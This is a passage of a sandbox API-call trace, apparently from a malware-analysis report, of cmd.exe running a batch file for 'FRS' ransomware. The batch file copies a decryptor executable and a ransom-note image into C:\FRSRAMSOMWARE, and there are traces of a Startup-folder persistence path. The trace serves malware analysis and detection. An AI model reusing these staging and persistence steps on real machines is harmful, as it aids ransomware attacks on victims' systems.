_get_osfhandle (_FileHandle=0) returned 0x24 [0037.178] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0037.178] SetConsoleInputExeNameW () returned 0x1 [0037.178] GetConsoleOutputCP () returned 0x1b5 [0037.178] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0037.178] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.179] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0037.179] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0037.179] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.179] SetFilePointer (in: hFile=0x80, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0037.179] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0037.179] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x2dd, lpOverlapped=0x0) returned 1 [0037.179] SetFilePointer (in: hFile=0x80, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0037.179] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0037.179] GetFileType (hFile=0x80) returned 0x1 [0037.179] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.179] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0037.179] GetEnvironmentVariableW (in: lpName="MYFILES", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F") returned 0x2f [0037.180] _tell (_FileHandle=3) returned 2006 [0037.180] _close (_FileHandle=3) returned 0 [0037.180] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0037.180] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0037.180] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0037.180] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0037.180] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0037.180] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0037.180] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.181] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.181] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.181] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.182] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.182] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\frs_decryptor.exe")) returned 0x20 [0037.182] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0xcf0000 [0037.182] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe", fInfoLevelId=0x1, lpFindFileData=0xd1bbf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd1bbf8) returned 0xd1beb8 [0037.183] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe", lpFilePart=0x0) returned 0x22 [0037.183] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe", _String2="con") returned -53 [0037.183] CreateFileW (lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\frs_decryptor.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e284, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x8c [0037.183] _open_osfhandle (_OSFileHandle=0x8c, _Flags=8) returned 3 [0037.183] _get_osfhandle (_FileHandle=3) returned 0x8c [0037.183] GetFileType (hFile=0x8c) returned 0x1 [0037.183] SetErrorMode (uMode=0x0) returned 0x0 [0037.183] SetErrorMode (uMode=0x1) returned 0x0 [0037.183] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe", nBufferLength=0x208, lpBuffer=0xc8e728, lpFilePart=0xc8e294 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe", lpFilePart=0xc8e294*="FRS_Decryptor.exe") returned 0x41 [0037.183] SetErrorMode (uMode=0x0) returned 0x1 [0037.183] ReadFile (in: hFile=0x8c, lpBuffer=0xcf0000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e2b8, lpOverlapped=0x0 | out: lpBuffer=0xcf0000*, lpNumberOfBytesRead=0xc8e2b8*=0x200, lpOverlapped=0x0) returned 1 [0037.183] SetErrorMode (uMode=0x0) returned 0x0 [0037.183] SetErrorMode (uMode=0x1) returned 0x0 [0037.183] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe", lpFilePart=0xc8de64*="FRS_Decryptor.exe") returned 0x22 [0037.183] SetErrorMode (uMode=0x0) returned 0x1 [0037.183] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe", _String2="C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe") returned 15 [0037.183] GetFileAttributesW (lpFileName="C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe" (normalized: "c:\\frsramsomware\\frs_decryptor.exe")) returned 0xffffffff [0037.183] GetLastError () returned 0x2 [0037.183] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe", nBufferLength=0x104, lpBuffer=0xc8e080, lpFilePart=0x0 | out: lpBuffer="C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe", lpFilePart=0x0) returned 0x22 [0037.183] SetErrorMode (uMode=0x0) returned 0x0 [0037.183] SetErrorMode (uMode=0x1) returned 0x0 [0037.183] GetFullPathNameW (in: lpFileName="C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe", nBufferLength=0x208, lpBuffer=0xc8de80, lpFilePart=0xc8de64 | out: lpBuffer="C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe", lpFilePart=0xc8de64*="FRS_Decryptor.exe") returned 0x22 [0037.183] SetErrorMode (uMode=0x0) returned 0x1 [0037.183] _wcsicmp (_String1="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe", _String2="C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe") returned 15 [0037.183] GetFileAttributesW (lpFileName="C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe" (normalized: "c:\\frsramsomware\\frs_decryptor.exe")) returned 0xffffffff [0037.183] CopyFileExW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\frs_decryptor.exe"), lpNewFileName="C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe" (normalized: "c:\\frsramsomware\\frs_decryptor.exe"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x12b5164, dwCopyFlags=0x0) returned 1 [0037.191] GetFileAttributesW (lpFileName="C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe" (normalized: "c:\\frsramsomware\\frs_decryptor.exe")) returned 0x20 [0037.191] SetFileAttributesW (lpFileName="C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe", dwFileAttributes=0x20) returned 1 [0037.192] _close (_FileHandle=3) returned 0 [0037.192] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.192] GetFileType (hFile=0xffffffff) returned 0x0 [0037.192] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0037.192] SetFileTime (hFile=0xffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0xc8e310) returned 0 [0037.192] FindNextFileW (in: hFindFile=0xd1beb8, lpFindFileData=0xd1bbf8 | out: lpFindFileData=0xd1bbf8) returned 0 [0037.192] GetLastError () returned 0x12 [0037.192] FindClose (in: hFindFile=0xd1beb8 | out: hFindFile=0xd1beb8) returned 1 [0037.193] _vsnwprintf (in: _Buffer=0x12d0890, _BufferCount=0x103, _Format="%9d", _ArgList=0xc8ed44 | out: _Buffer=" 1") returned 9 [0037.193] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.193] GetFileType (hFile=0x28) returned 0x2 [0037.193] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0037.193] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8ecb8 | out: lpMode=0xc8ecb8) returned 1 [0037.193] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.193] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x28, lpConsoleScreenBufferInfo=0xc8ed08 | out: lpConsoleScreenBufferInfo=0xc8ed08) returned 1 [0037.193] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0037.194] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x12c8840, nSize=0x2000, Arguments=0xc8ed38 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0037.194] WriteConsoleW (in: hConsoleOutput=0x28, lpBuffer=0x12c8840*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0xc8ecec, lpReserved=0x0 | out: lpBuffer=0x12c8840*, lpNumberOfCharsWritten=0xc8ecec*=0x1b) returned 1 [0037.194] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0xc8ed58, ProcessInformationLength=0x4) returned 0x0 [0037.194] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.194] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0037.195] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.195] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0037.195] _get_osfhandle (_FileHandle=0) returned 0x24 [0037.195] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0037.195] SetConsoleInputExeNameW () returned 0x1 [0037.195] GetConsoleOutputCP () returned 0x1b5 [0037.195] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0037.195] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.195] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0037.196] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0037.196] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.196] SetFilePointer (in: hFile=0x80, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0037.196] VirtualFree (lpAddress=0xcf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.196] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0037.196] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x298, lpOverlapped=0x0) returned 1 [0037.196] SetFilePointer (in: hFile=0x80, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0037.196] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0037.196] GetFileType (hFile=0x80) returned 0x1 [0037.196] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.196] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0037.196] GetEnvironmentVariableW (in: lpName="MYFILES", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F") returned 0x2f [0037.197] _tell (_FileHandle=3) returned 2079 [0037.197] _close (_FileHandle=3) returned 0 [0037.197] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0037.197] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0037.197] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0037.197] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0037.197] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0037.197] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0037.197] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.197] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.197] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.198] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.198] _wcsnicmp 